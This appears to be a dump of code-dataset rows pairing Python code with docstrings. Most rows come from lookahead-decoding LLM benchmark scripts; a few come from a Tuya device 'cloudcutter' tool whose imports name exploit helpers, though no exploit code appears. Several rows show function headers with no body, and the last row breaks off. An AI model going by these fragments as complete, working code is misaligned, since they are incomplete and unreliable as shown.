This is the equivalent of torch.repeat_interleave(x, dim=1, repeats=n_rep). The hidden states go from (batch, num_key_value_heads, seqlen, head_dim) to (batch, num_attention_heads, seqlen, head_dim)
Here is the function:
def repeat_kv(hidden_states: torch.Tensor, n_rep: int) -> torch.Tensor:
"""
This is the equivalent of torch.repeat_interleave(x, dim=1, repeats=n_rep). The hidden states go from (batch,
num_key_value_heads, seqlen, head_dim) to (batch, num_attention_heads, seqlen, head_dim)
"""
batch, num_key_value_heads, slen, head_dim = hidden_states.shape
if n_rep == 1:
return hidden_states
hidden_states = hidden_states[:, :, None, :, :].expand(batch, num_key_value_heads, n_rep, slen, head_dim)
return hidden_states.reshape(batch, num_key_value_heads * n_rep, slen, head_dim) | This is the equivalent of torch.repeat_interleave(x, dim=1, repeats=n_rep). The hidden states go from (batch, num_key_value_heads, seqlen, head_dim) to (batch, num_attention_heads, seqlen, head_dim) |
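A quick shape check for grouped-query attention: 2 key/value heads repeated 4 times give 8 attention heads:
import torch

kv = torch.randn(1, 2, 5, 64)      # (batch, num_key_value_heads, seq_len, head_dim)
print(repeat_kv(kv, 4).shape)      # torch.Size([1, 8, 5, 64])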
188,479 | import argparse
import json
import os
import random
import time
import shortuuid
import torch
from tqdm import tqdm
from typing import Dict, List, Optional
from fastchat.llm_judge.common import load_questions, temperature_config
from fastchat.model import get_conversation_template
from fastchat.utils import str_to_torch_dtype
import time
import lade
from transformers import AutoTokenizer, AutoConfig, AutoModelForCausalLM, LlamaForCausalLM
from fastchat.model.model_adapter import Llama2Adapter, raise_warning_for_incompatible_cpu_offloading_configuration
def get_model_answers(
model_path,
model_id,
questions,
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
max_gpu_memory,
dtype,
debug,
cache_dir,
cpu_offloading,
use_pp,
use_tp_ds,
use_tp,
use_flash,
do_sample
):
def run_eval(
model_path,
model_id,
question_file,
question_begin,
question_end,
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
num_gpus_total,
max_gpu_memory,
dtype,
debug,
cache_dir,
cpu_offloading,
use_pp,
use_tp,
use_tp_ds,
use_flash,
do_sample
):
questions = load_questions(question_file, question_begin, question_end)
# random shuffle the questions to balance the loading
###not shuffle
#random.shuffle(questions)
# Split the question file into `num_gpus` files
assert num_gpus_total % num_gpus_per_model == 0
get_answers_func = get_model_answers
chunk_size = len(questions) // (num_gpus_total // num_gpus_per_model)
ans_handles = []
for i in range(0, len(questions), chunk_size):
ans_handles.append(
get_answers_func(
model_path,
model_id,
questions[i : i + chunk_size],
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
max_gpu_memory,
dtype=dtype,
debug=debug,
cache_dir=cache_dir,
cpu_offloading=cpu_offloading,
use_tp=use_tp,
use_pp=use_pp,
use_tp_ds=use_tp_ds,
use_flash=use_flash,
do_sample=do_sample
)
) | null |
188,480 | import argparse
import json
import os
import random
import time
import shortuuid
import torch
from tqdm import tqdm
from typing import Dict, List, Optional
from fastchat.llm_judge.common import load_questions, temperature_config
from fastchat.model import get_conversation_template
from fastchat.utils import str_to_torch_dtype
import time
import lade
from transformers import AutoTokenizer, AutoConfig, AutoModelForCausalLM, LlamaForCausalLM
from fastchat.model.model_adapter import Llama2Adapter, raise_warning_for_incompatible_cpu_offloading_configuration
The provided code snippet includes necessary dependencies for implementing the `reorg_answer_file` function. Write a Python function `def reorg_answer_file(answer_file)` to solve the following problem:
Sort by question id and de-duplication
Here is the function:
def reorg_answer_file(answer_file):
"""Sort by question id and de-duplication"""
answers = {}
with open(answer_file, "r") as fin:
for l in fin:
qid = json.loads(l)["question_id"]
answers[qid] = l
qids = sorted(list(answers.keys()))
with open(answer_file, "w") as fout:
for qid in qids:
fout.write(answers[qid]) | Sort by question id and de-duplication |
188,481 | import argparse
import json
import os
import random
import time
import shortuuid
import torch
from tqdm import tqdm
from typing import Dict, List, Optional
from fastchat.llm_judge.common import load_questions, temperature_config
from fastchat.model import get_conversation_template
from fastchat.utils import str_to_torch_dtype
import time
import lade
from datasets import load_dataset
from transformers import AutoTokenizer, AutoConfig, AutoModelForCausalLM, LlamaForCausalLM
from fastchat.model.model_adapter import Llama2Adapter, raise_warning_for_incompatible_cpu_offloading_configuration
def get_model_answers(
model_path,
model_id,
questions,
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
max_gpu_memory,
dtype,
debug,
cache_dir,
cpu_offloading,
use_pp,
use_tp_ds,
use_tp,
use_flash,
do_sample
):
devices = os.environ.get("CUDA_VISIBLE_DEVICES", "0").split(",")
print("configuration: ", "flash attn: ", use_flash, " HF PP: ", use_pp, " DS TP: ", use_tp_ds, " GPUS: ", devices)
ds_local_rank = int(os.getenv('LOCAL_RANK', '0'))
if use_pp:
model, tokenizer = load_model(
model_path,
use_flash=use_flash,
device=f"cuda",
device_map="balanced",
num_gpus=num_gpus_per_model,
max_gpu_memory=max_gpu_memory,
dtype=dtype,
load_8bit=False,
cpu_offloading=cpu_offloading,
debug=debug,
)
elif use_tp_ds:
import deepspeed
torch.cuda.set_device(int(os.getenv('LOCAL_RANK', '0')))
model, tokenizer = load_model(
model_path,
use_flash=use_flash,
device_map="cpu",
num_gpus=num_gpus_per_model,
max_gpu_memory=max_gpu_memory,
dtype=dtype,
load_8bit=False,
cpu_offloading=cpu_offloading,
debug=debug,
)
model = deepspeed.init_inference(
model,
mp_size=int(os.getenv("WORLD_SIZE", "1")),
dtype=torch.half
)
else:
model, tokenizer = load_model(
model_path,
use_flash=use_flash,
device=f"cuda:{lade.get_device()}",
num_gpus=num_gpus_per_model,
max_gpu_memory=max_gpu_memory,
dtype=dtype,
load_8bit=False,
cpu_offloading=cpu_offloading,
debug=debug,
)
#model = AutoModelForCausalLM.from_pretrained(model_path, config=cfg, torch_dtype=torch.float16, device_map=lade.get_device())
model.tokenizer = tokenizer
overall_time = 0
overall_tp = 0
overall_gen = 0
count_gen = 0
stats = {}
for question_idx, question in enumerate(tqdm(questions)):
stats[question_idx] = {} #
choices = []
for i in range(num_choices):
torch.manual_seed(i)
conv = get_conversation_template(model_id)
turns = []
prompts = []
for j in range(1):
prompt = f'''[INST] <<SYS>>
You are an intelligent chatbot. Answer the questions only using the following context:
{question}
Here are some rules you always follow:
- Generate human readable output, avoid creating output with gibberish text.
- Generate only the requested output, don't include any other language before or after the requested output.
- Never say thank you, that you are happy to help, that you are an AI agent, etc. Just answer directly.
- Generate professional language typically used in business documents in North America.
- Never generate offensive or foul language.
<</SYS>>
Briefly summarize the given context. [/INST]
Summary: '''
prompts.append(prompt)
input_ids = tokenizer([prompt]).input_ids
#print("len: ", len(input_ids[0]))
if len(input_ids[0]) > 2048: #skip input len > 2048 tokens
continue
# some models may error out when generating long outputs
if True:
if do_sample:
start_time = time.time()
output_ids = model.generate(torch.as_tensor(input_ids).cuda(), max_new_tokens=max_new_token, do_sample=True, top_k=0, temperature=1.0, top_p=1.0)
end_time = time.time()
else:
start_time = time.time()
output_ids = model.generate(torch.as_tensor(input_ids).cuda(), max_new_tokens=max_new_token, do_sample=False, top_k=0)
end_time = time.time()
gap_time = end_time - start_time
tokens = output_ids.numel() - len(input_ids[0])
overall_time += gap_time
overall_gen += tokens
overall_tp += tokens / gap_time
count_gen += 1
stats[question_idx][j] = [gap_time, tokens]
if lade.get_device() == 0 and ds_local_rank == 0:
print([f"step {i} turn {j} time: ", gap_time, " generated tokens: ", tokens, " throughput: " , tokens / gap_time])
if model.config.is_encoder_decoder:
output_ids = output_ids[0]
else:
output_ids = output_ids[0][len(input_ids[0]) :]
# be consistent with the template's stop_token_ids
if conv.stop_token_ids:
stop_token_ids_index = [
i
for i, id in enumerate(output_ids)
if id in conv.stop_token_ids
]
if len(stop_token_ids_index) > 0:
output_ids = output_ids[: stop_token_ids_index[0]]
output = tokenizer.decode(
output_ids,
spaces_between_special_tokens=False,
)
if conv.stop_str and output.find(conv.stop_str) > 0:
output = output[: output.find(conv.stop_str)]
for special_token in tokenizer.special_tokens_map.values():
if isinstance(special_token, list):
for special_tok in special_token:
output = output.replace(special_tok, "")
else:
output = output.replace(special_token, "")
output = output.strip()
if conv.name == "xgen" and output.startswith("Assistant:"):
output = output.replace("Assistant:", "", 1).strip()
#print("output: ", output)
'''
except RuntimeError as e:
print("ERROR question ID: ", question["question_id"])
output = "ERROR"
'''
turns.append(output)
choices.append({"index": i, "turns": turns, "prompts" : prompts})
if lade.get_device() == 0 and ds_local_rank == 0:
# Dump answers
os.makedirs(os.path.dirname(answer_file), exist_ok=True)
with open(os.path.expanduser(answer_file), "a") as fout:
ans_json = {
"question_id": question_idx,
"answer_id": shortuuid.uuid(),
"model_id": model_id,
"choices": choices,
"tstamp": time.time(),
}
fout.write(json.dumps(ans_json) + "\n")
#if question_idx == 1:
# break
if lade.get_device() == 0 and ds_local_rank == 0:
torch.save(stats[question_idx], answer_file + ".pt")
print("LOG SAVE TO ", answer_file + ".pt")
print(f"AVERAGE THROUGHPUT1 {overall_tp / count_gen} AVERAGE THROUGHPUT2 {overall_gen / overall_time} STAT {[overall_tp, count_gen, overall_gen, overall_time]}")
lade.log_history()
lade.save_log(answer_file + "-lade-log.pt")
def run_eval(
model_path,
model_id,
question_file,
question_begin,
question_end,
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
num_gpus_total,
max_gpu_memory,
dtype,
debug,
cache_dir,
cpu_offloading,
use_pp,
use_tp,
use_tp_ds,
use_flash,
do_sample
):
questions = load_dataset("EdinburghNLP/xsum", split="validation", streaming=False)["document"][question_begin:question_end]
# random shuffle the questions to balance the loading
###not shuffle
#random.shuffle(questions)
# Split the question file into `num_gpus` files
assert num_gpus_total % num_gpus_per_model == 0
get_answers_func = get_model_answers
chunk_size = len(questions) // (num_gpus_total // num_gpus_per_model)
ans_handles = []
for i in range(0, len(questions), chunk_size):
ans_handles.append(
get_answers_func(
model_path,
model_id,
questions[i : i + chunk_size],
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
max_gpu_memory,
dtype=dtype,
debug=debug,
cache_dir=cache_dir,
cpu_offloading=cpu_offloading,
use_tp=use_tp,
use_pp=use_pp,
use_tp_ds=use_tp_ds,
use_flash=use_flash,
do_sample=do_sample
)
) | null |
188,482 | import argparse
import json
import os
import random
import time
import shortuuid
import torch
from tqdm import tqdm
from typing import Dict, List, Optional
from fastchat.llm_judge.common import load_questions, temperature_config
from fastchat.model import get_conversation_template
from fastchat.utils import str_to_torch_dtype
import time
import lade
from datasets import load_dataset
from transformers import AutoTokenizer, AutoConfig, AutoModelForCausalLM, LlamaForCausalLM
from fastchat.model.model_adapter import Llama2Adapter, raise_warning_for_incompatible_cpu_offloading_configuration
The provided code snippet includes necessary dependencies for implementing the `reorg_answer_file` function. Write a Python function `def reorg_answer_file(answer_file)` to solve the following problem:
Sort by question id and de-duplication
Here is the function:
def reorg_answer_file(answer_file):
"""Sort by question id and de-duplication"""
answers = {}
with open(answer_file, "r") as fin:
for l in fin:
qid = json.loads(l)["question_id"]
answers[qid] = l
qids = sorted(list(answers.keys()))
with open(answer_file, "w") as fout:
for qid in qids:
fout.write(answers[qid]) | Sort by question id and de-duplication |
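A minimal usage sketch of the reorg_answer_file behaviour above, assuming the function defined in the preceding snippet is in scope; the file name and its rows are hypothetical and only show that the last entry for a repeated question_id wins and that output is sorted by id.

import json

# Hypothetical answer file: question_id 2 appears twice, out of order.
with open("answers.jsonl", "w") as f:
    for row in [{"question_id": 2, "answer_id": "old"},
                {"question_id": 1, "answer_id": "a"},
                {"question_id": 2, "answer_id": "new"}]:
        f.write(json.dumps(row) + "\n")

reorg_answer_file("answers.jsonl")

# The file now contains two lines, ordered 1 then 2, and the surviving
# entry for question_id 2 is the one with answer_id "new".
with open("answers.jsonl") as f:
    print(f.read())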
188,483 | import argparse
import json
import os
import random
import time
import shortuuid
import torch
from tqdm import tqdm
from typing import Dict, List, Optional
from fastchat.llm_judge.common import load_questions, temperature_config
from fastchat.model import get_conversation_template
from fastchat.utils import str_to_torch_dtype
import time
import lade
from datasets import load_dataset
from transformers import AutoTokenizer, AutoConfig, AutoModelForCausalLM, LlamaForCausalLM
from fastchat.model.model_adapter import Llama2Adapter, raise_warning_for_incompatible_cpu_offloading_configuration
def get_model_answers(
model_path,
model_id,
questions,
question_end,
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
max_gpu_memory,
dtype,
debug,
cache_dir,
cpu_offloading,
use_pp,
use_tp_ds,
use_tp,
use_flash,
do_sample
):
devices = os.environ.get("CUDA_VISIBLE_DEVICES", "0").split(",")
print("configuration: ", "flash attn: ", use_flash, " HF PP: ", use_pp, " DS TP: ", use_tp_ds, " GPUS: ", devices)
#tokenizer = AutoTokenizer.from_pretrained(model_path)
#cfg = AutoConfig.from_pretrained(model_path)
#cfg._flash_attn_2_enabled= use_flash
ds_local_rank = int(os.getenv('LOCAL_RANK', '0'))
if use_pp:
model, tokenizer = load_model(
model_path,
use_flash=use_flash,
device=f"cuda",
device_map="balanced",
num_gpus=num_gpus_per_model,
max_gpu_memory=max_gpu_memory,
dtype=dtype,
load_8bit=False,
cpu_offloading=cpu_offloading,
debug=debug,
)
elif use_tp_ds:
import deepspeed
torch.cuda.set_device(int(os.getenv('LOCAL_RANK', '0')))
model, tokenizer = load_model(
model_path,
use_flash=use_flash,
device_map="cpu",
num_gpus=num_gpus_per_model,
max_gpu_memory=max_gpu_memory,
dtype=dtype,
load_8bit=False,
cpu_offloading=cpu_offloading,
debug=debug,
)
model = deepspeed.init_inference(
model,
mp_size=int(os.getenv("WORLD_SIZE", "1")),
dtype=torch.half
)
else:
model, tokenizer = load_model(
model_path,
use_flash=use_flash,
device=f"cuda:{lade.get_device()}",
num_gpus=num_gpus_per_model,
max_gpu_memory=max_gpu_memory,
dtype=dtype,
load_8bit=False,
cpu_offloading=cpu_offloading,
debug=debug,
)
#model = AutoModelForCausalLM.from_pretrained(model_path, config=cfg, torch_dtype=torch.float16, device_map=lade.get_device())
model.tokenizer = tokenizer
overall_time = 0
overall_tp = 0
overall_gen = 0
count_gen = 0
stats = {}
for question_idx, description in enumerate(tqdm(questions["class_description"][:question_end])):
if not do_sample:
temperature = 0.0 #force greedy
stats[question_idx] = {} #
choices = []
for i in range(num_choices):
torch.manual_seed(i)
conv = get_conversation_template(model_id)
turns = []
prompts = []
for j in range(1):
qs = ""
import_stat = '\n'.join(questions["import_statement"][question_idx])
qs += import_stat
class_init = questions["class_constructor"][question_idx]
class_init_list = class_init.split('\n')
class_init_list[0] += " \n" + description
class_init = '\n'.join(class_init_list)
qs = qs + "\n" + class_init
prompt = qs
input_ids = tokenizer(prompt, return_tensors="pt",
max_length=1024, truncation=True).input_ids.to("cuda")
if temperature < 1e-4:
do_sample = False
else:
do_sample = True
# some models may error out when generating long outputs
if True:
start_time = time.time()
output_ids = model.generate(
input_ids,
do_sample=do_sample,
temperature=temperature,
max_new_tokens=max_new_token,
)
end_time = time.time()
gap_time = end_time - start_time
tokens = output_ids.numel() - input_ids.numel()
overall_time += gap_time
overall_gen += tokens
overall_tp += tokens / gap_time
count_gen += 1
stats[question_idx][j] = [gap_time, tokens]
if lade.get_device() == 0 and ds_local_rank == 0:
print([f"step {i} turn {j} time: ", gap_time, " generated tokens: ", tokens, " throughput: " , tokens / gap_time])
output = tokenizer.decode(
output_ids[0].tolist(),
skip_special_tokens=False,
)
turns.append(output)
prompts.append(prompt)
choices.append({"index": i, "turns": turns, "prompts" : prompts})
if lade.get_device() == 0 and ds_local_rank == 0:
# Dump answers
os.makedirs(os.path.dirname(answer_file), exist_ok=True)
with open(os.path.expanduser(answer_file), "a") as fout:
ans_json = {
"question_id": question_idx,
"answer_id": shortuuid.uuid(),
"model_id": model_id,
"choices": choices,
"tstamp": time.time(),
}
fout.write(json.dumps(ans_json) + "\n")
#if question_idx == 1:
# break
if lade.get_device() == 0 and ds_local_rank == 0:
torch.save(stats[question_idx], answer_file + ".pt")
print("LOG SAVE TO ", answer_file + ".pt")
print(f"AVERAGE THROUGHPUT1 {overall_tp / count_gen} AVERAGE THROUGHPUT2 {overall_gen / overall_time} STAT {[overall_tp, count_gen, overall_gen, overall_time]}")
lade.log_history()
lade.save_log(answer_file + "-lade-log.pt")
def run_eval(
model_path,
model_id,
question_file,
question_begin,
question_end,
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
num_gpus_total,
max_gpu_memory,
dtype,
debug,
cache_dir,
cpu_offloading,
use_pp,
use_tp,
use_tp_ds,
use_flash,
do_sample
):
#questions = load_questions(question_file, question_begin, question_end)
ClassEval = load_dataset("FudanSELab/ClassEval")
questions = ClassEval["test"]
# random shuffle the questions to balance the loading
###not shuffle
#random.shuffle(questions)
# Split the question file into `num_gpus` files
assert num_gpus_total % num_gpus_per_model == 0
get_answers_func = get_model_answers
chunk_size = len(questions) // (num_gpus_total // num_gpus_per_model)
ans_handles = []
for i in range(0, len(questions), chunk_size):
ans_handles.append(
get_answers_func(
model_path,
model_id,
questions[i : i + chunk_size],
question_end,
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
max_gpu_memory,
dtype=dtype,
debug=debug,
cache_dir=cache_dir,
cpu_offloading=cpu_offloading,
use_tp=use_tp,
use_pp=use_pp,
use_tp_ds=use_tp_ds,
use_flash=use_flash,
do_sample=do_sample
)
) | null |
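The work-splitting arithmetic in run_eval above is worth seeing in isolation: with made-up GPU counts, the question list is sliced into one chunk per model replica. This sketch uses no model code and the numbers are purely illustrative.

# 8 GPUs total with 2 GPUs per model gives 4 replicas, so 10 questions
# are cut into slices of length 10 // 4 == 2 (five slices in total,
# exactly as the range/step loop in run_eval produces).
questions = list(range(10))
num_gpus_total, num_gpus_per_model = 8, 2
chunk_size = len(questions) // (num_gpus_total // num_gpus_per_model)
chunks = [questions[i:i + chunk_size] for i in range(0, len(questions), chunk_size)]
print(chunks)  # [[0, 1], [2, 3], [4, 5], [6, 7], [8, 9]]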
188,485 | import argparse
import json
import os
import random
import time
import shortuuid
import torch
from tqdm import tqdm
from typing import Dict, List, Optional
from fastchat.llm_judge.common import load_questions, temperature_config
from fastchat.model import get_conversation_template
from fastchat.utils import str_to_torch_dtype
import time
import lade
from human_eval.data import write_jsonl, read_problems
from transformers import AutoTokenizer, AutoConfig, AutoModelForCausalLM, LlamaForCausalLM
from fastchat.model.model_adapter import Llama2Adapter, raise_warning_for_incompatible_cpu_offloading_configuration
def get_model_answers(
model_path,
model_id,
questions,
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
max_gpu_memory,
dtype,
debug,
cache_dir,
cpu_offloading,
use_pp,
use_tp_ds,
use_tp,
use_flash,
do_sample
):
def run_eval(
model_path,
model_id,
question_file,
question_begin,
question_end,
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
num_gpus_total,
max_gpu_memory,
dtype,
debug,
cache_dir,
cpu_offloading,
use_pp,
use_tp,
use_tp_ds,
use_flash,
do_sample
):
#questions = load_questions(question_file, question_begin, question_end)
questions = read_problems()
questions = list(questions.values())[question_begin:question_end]
# random shuffle the questions to balance the loading
###not shuffle
#random.shuffle(questions)
# Split the question file into `num_gpus` files
assert num_gpus_total % num_gpus_per_model == 0
get_answers_func = get_model_answers
chunk_size = len(questions) // (num_gpus_total // num_gpus_per_model)
ans_handles = []
for i in range(0, len(questions), chunk_size):
ans_handles.append(
get_answers_func(
model_path,
model_id,
questions[i : i + chunk_size],
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
max_gpu_memory,
dtype=dtype,
debug=debug,
cache_dir=cache_dir,
cpu_offloading=cpu_offloading,
use_tp=use_tp,
use_pp=use_pp,
use_tp_ds=use_tp_ds,
use_flash=use_flash,
do_sample=do_sample
)
) | null |
188,486 | import argparse
import json
import os
import random
import time
import shortuuid
import torch
from tqdm import tqdm
from typing import Dict, List, Optional
from fastchat.llm_judge.common import load_questions, temperature_config
from fastchat.model import get_conversation_template
from fastchat.utils import str_to_torch_dtype
import time
import lade
from human_eval.data import write_jsonl, read_problems
from transformers import AutoTokenizer, AutoConfig, AutoModelForCausalLM, LlamaForCausalLM
from fastchat.model.model_adapter import Llama2Adapter, raise_warning_for_incompatible_cpu_offloading_configuration
The provided code snippet includes necessary dependencies for implementing the `reorg_answer_file` function. Write a Python function `def reorg_answer_file(answer_file)` to solve the following problem:
Sort by question id and de-duplication
Here is the function:
def reorg_answer_file(answer_file):
"""Sort by question id and de-duplication"""
answers = {}
with open(answer_file, "r") as fin:
for l in fin:
qid = json.loads(l)["question_id"]
answers[qid] = l
qids = sorted(list(answers.keys()))
with open(answer_file, "w") as fout:
for qid in qids:
fout.write(answers[qid]) | Sort by question id and de-duplication |
188,487 | import argparse
import json
import os
import random
import time
import shortuuid
import torch
from tqdm import tqdm
from typing import Dict, List, Optional
from fastchat.llm_judge.common import load_questions, temperature_config
from fastchat.model import get_conversation_template
from fastchat.utils import str_to_torch_dtype
import time
import lade
from datasets import load_dataset
from transformers import AutoTokenizer, AutoConfig, AutoModelForCausalLM, LlamaForCausalLM
from fastchat.model.model_adapter import Llama2Adapter, raise_warning_for_incompatible_cpu_offloading_configuration
def get_model_answers(
model_path,
model_id,
questions,
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
max_gpu_memory,
dtype,
debug,
cache_dir,
cpu_offloading,
use_pp,
use_tp_ds,
use_tp,
use_flash,
do_sample
):
devices = os.environ.get("CUDA_VISIBLE_DEVICES", "0").split(",")
print("configuration: ", "flash attn: ", use_flash, " HF PP: ", use_pp, " DS TP: ", use_tp_ds, " GPUS: ", devices)
ds_local_rank = int(os.getenv('LOCAL_RANK', '0'))
if use_pp:
model, tokenizer = load_model(
model_path,
use_flash=use_flash,
device=f"cuda",
device_map="balanced",
num_gpus=num_gpus_per_model,
max_gpu_memory=max_gpu_memory,
dtype=dtype,
load_8bit=False,
cpu_offloading=cpu_offloading,
debug=debug,
)
elif use_tp_ds:
import deepspeed
torch.cuda.set_device(int(os.getenv('LOCAL_RANK', '0')))
model, tokenizer = load_model(
model_path,
use_flash=use_flash,
device_map="cpu",
num_gpus=num_gpus_per_model,
max_gpu_memory=max_gpu_memory,
dtype=dtype,
load_8bit=False,
cpu_offloading=cpu_offloading,
debug=debug,
)
model = deepspeed.init_inference(
model,
mp_size=int(os.getenv("WORLD_SIZE", "1")),
dtype=torch.half
)
else:
model, tokenizer = load_model(
model_path,
use_flash=use_flash,
device=f"cuda:{lade.get_device()}",
num_gpus=num_gpus_per_model,
max_gpu_memory=max_gpu_memory,
dtype=dtype,
load_8bit=False,
cpu_offloading=cpu_offloading,
debug=debug,
)
#model = AutoModelForCausalLM.from_pretrained(model_path, config=cfg, torch_dtype=torch.float16, device_map=lade.get_device())
model.tokenizer = tokenizer
overall_time = 0
overall_tp = 0
overall_gen = 0
count_gen = 0
stats = {}
for question_idx, question in enumerate(tqdm(questions)):
stats[question_idx] = {} #
choices = []
for i in range(num_choices):
torch.manual_seed(i)
conv = get_conversation_template(model_id)
turns = []
prompts = []
for j in range(1):
prompt = f'''[INST] <<SYS>>
You are an intelligent chatbot. Answer the questions only using the following context:
{question}
Here are some rules you always follow:
- Generate human readable output, avoid creating output with gibberish text.
- Generate only the requested output, don't include any other language before or after the requested output.
- Never say thank you, that you are happy to help, that you are an AI agent, etc. Just answer directly.
- Generate professional language typically used in business documents in North America.
- Never generate offensive or foul language.
<</SYS>>
Briefly summarize the given context. [/INST]
Summary: '''
prompts.append(prompt)
input_ids = tokenizer([prompt]).input_ids
#print("len: ", len(input_ids[0]))
if len(input_ids[0]) > 2048: #skip input len > 2048 tokens
continue
# some models may error out when generating long outputs
if True:
if do_sample:
start_time = time.time()
output_ids = model.generate(torch.as_tensor(input_ids).cuda(), max_new_tokens=max_new_token, do_sample=True, top_k=0, temperature=1.0, top_p=1.0)
end_time = time.time()
else:
start_time = time.time()
output_ids = model.generate(torch.as_tensor(input_ids).cuda(), max_new_tokens=max_new_token, do_sample=False, top_k=0)
end_time = time.time()
gap_time = end_time - start_time
tokens = output_ids.numel() - len(input_ids[0])
overall_time += gap_time
overall_gen += tokens
overall_tp += tokens / gap_time
count_gen += 1
stats[question_idx][j] = [gap_time, tokens]
if lade.get_device() == 0 and ds_local_rank == 0:
print([f"step {i} turn {j} time: ", gap_time, " generated tokens: ", tokens, " throughput: " , tokens / gap_time])
if model.config.is_encoder_decoder:
output_ids = output_ids[0]
else:
output_ids = output_ids[0][len(input_ids[0]) :]
# be consistent with the template's stop_token_ids
if conv.stop_token_ids:
stop_token_ids_index = [
i
for i, id in enumerate(output_ids)
if id in conv.stop_token_ids
]
if len(stop_token_ids_index) > 0:
output_ids = output_ids[: stop_token_ids_index[0]]
output = tokenizer.decode(
output_ids,
spaces_between_special_tokens=False,
)
if conv.stop_str and output.find(conv.stop_str) > 0:
output = output[: output.find(conv.stop_str)]
for special_token in tokenizer.special_tokens_map.values():
if isinstance(special_token, list):
for special_tok in special_token:
output = output.replace(special_tok, "")
else:
output = output.replace(special_token, "")
output = output.strip()
if conv.name == "xgen" and output.startswith("Assistant:"):
output = output.replace("Assistant:", "", 1).strip()
#print("output: ", output)
'''
except RuntimeError as e:
print("ERROR question ID: ", question["question_id"])
output = "ERROR"
'''
turns.append(output)
choices.append({"index": i, "turns": turns, "prompts" : prompts})
if lade.get_device() == 0 and ds_local_rank == 0:
# Dump answers
os.makedirs(os.path.dirname(answer_file), exist_ok=True)
with open(os.path.expanduser(answer_file), "a") as fout:
ans_json = {
"question_id": question_idx,
"answer_id": shortuuid.uuid(),
"model_id": model_id,
"choices": choices,
"tstamp": time.time(),
}
fout.write(json.dumps(ans_json) + "\n")
#if question_idx == 1:
# break
if lade.get_device() == 0 and ds_local_rank == 0:
torch.save(stats[question_idx], answer_file + ".pt")
print("LOG SAVE TO ", answer_file + ".pt")
print(f"AVERAGE THROUGHPUT1 {overall_tp / count_gen} AVERAGE THROUGHPUT2 {overall_gen / overall_time} STAT {[overall_tp, count_gen, overall_gen, overall_time]}")
lade.log_history()
lade.save_log(answer_file + "-lade-log.pt")
def run_eval(
model_path,
model_id,
question_file,
question_begin,
question_end,
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
num_gpus_total,
max_gpu_memory,
dtype,
debug,
cache_dir,
cpu_offloading,
use_pp,
use_tp,
use_tp_ds,
use_flash,
do_sample
):
questions = load_dataset("cnn_dailymail", "3.0.0", split="validation", streaming=False)["article"][question_begin:question_end]
# random shuffle the questions to balance the loading
###not shuffle
#random.shuffle(questions)
# Split the question file into `num_gpus` files
assert num_gpus_total % num_gpus_per_model == 0
get_answers_func = get_model_answers
chunk_size = len(questions) // (num_gpus_total // num_gpus_per_model)
ans_handles = []
for i in range(0, len(questions), chunk_size):
ans_handles.append(
get_answers_func(
model_path,
model_id,
questions[i : i + chunk_size],
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
max_gpu_memory,
dtype=dtype,
debug=debug,
cache_dir=cache_dir,
cpu_offloading=cpu_offloading,
use_tp=use_tp,
use_pp=use_pp,
use_tp_ds=use_tp_ds,
use_flash=use_flash,
do_sample=do_sample
)
) | null |
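The evaluation loop above reports two different averages (the mean of per-request throughputs and total tokens divided by total time). A tiny sketch with invented timings shows why the two figures can disagree.

# Request A: 100 tokens in 1 s; request B: 100 tokens in 4 s (made-up numbers).
samples = [(100, 1.0), (100, 4.0)]  # (tokens, seconds)
mean_of_rates = sum(t / s for t, s in samples) / len(samples)            # (100 + 25) / 2 = 62.5
overall_rate = sum(t for t, _ in samples) / sum(s for _, s in samples)   # 200 / 5 = 40.0
print(mean_of_rates, overall_rate)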
188,489 | import base64
import datetime
import json
import os
import sys
import time
from typing import List
import tornado
from cloudcutter.protocol import mqtt
from ..crypto.tuyacipher import TuyaCipher, TuyaCipherKeyChoice
from ..device import DeviceConfig
from ..utils import object_to_json
from .transformers import ResponseTransformer
device_mac = ""
def log_request(endpoint, request, decrypted_request_body, verbose_output: bool = False):
clean_request_body: str = ""
if len(request.body) > 0 or len(decrypted_request_body) > 0:
if (decrypted_request_body is not None):
clean_request_body = decrypted_request_body
else:
clean_request_body = request.body
if type(clean_request_body) == bytes:
clean_request_body = clean_request_body.decode()
try:
body_json = json.loads(clean_request_body)
if body_json['hid'] is not None:
mac_str = body_json['hid']
mac_iter = iter(mac_str)
global device_mac
device_mac = ':'.join(a+b for a, b in zip(mac_iter, mac_iter))
except:
pass
if verbose_output:
# print a blank line for easier reading
print("")
        print(f'[{datetime.datetime.now().time()} LOG (Client)] Request: {request}')
if len(clean_request_body) > 0:
print(f'[{datetime.datetime.now().time()} LOG (Client)] ==== Request body ===')
print(clean_request_body)
print(f'[{datetime.datetime.now().time()} LOG (Client)] ==== End request body ===')
else:
print(f"Processing endpoint {endpoint}") | null |
188,490 | import base64
import datetime
import json
import os
import sys
import time
from typing import List
import tornado
from cloudcutter.protocol import mqtt
from ..crypto.tuyacipher import TuyaCipher, TuyaCipherKeyChoice
from ..device import DeviceConfig
from ..utils import object_to_json
from .transformers import ResponseTransformer
def log_response(response, verbose_output: bool = False):
if verbose_output:
print(f'[{datetime.datetime.now().time()} LOG (Server)] Response: ', response) | null |
188,491 | import json
def object_to_json(obj):
return json.dumps(obj, separators=(',', ':')) | null |
188,492 | import argparse
from datetime import datetime, timedelta
import hmac
import json
import os
import re
import sys
import time
from hashlib import sha256
from traceback import print_exc
import tornado.httpserver
import tornado.ioloop
import tornado.web
from tornado.log import enable_pretty_logging
import tinytuya.tinytuya as tinytuya
from .crypto.pskcontext import PSKContext
from .device import DEFAULT_AUTH_KEY, DeviceConfig
from .exploit import (build_network_config_packet, exploit_device_with_config,
create_device_specific_config, send_network_config_datagram)
from .protocol import handlers, mqtt
from .protocol.transformers import ResponseTransformer
def __configure_local_device_or_update_firmware(args, update_firmware: bool = False):
if not os.path.exists(args.config):
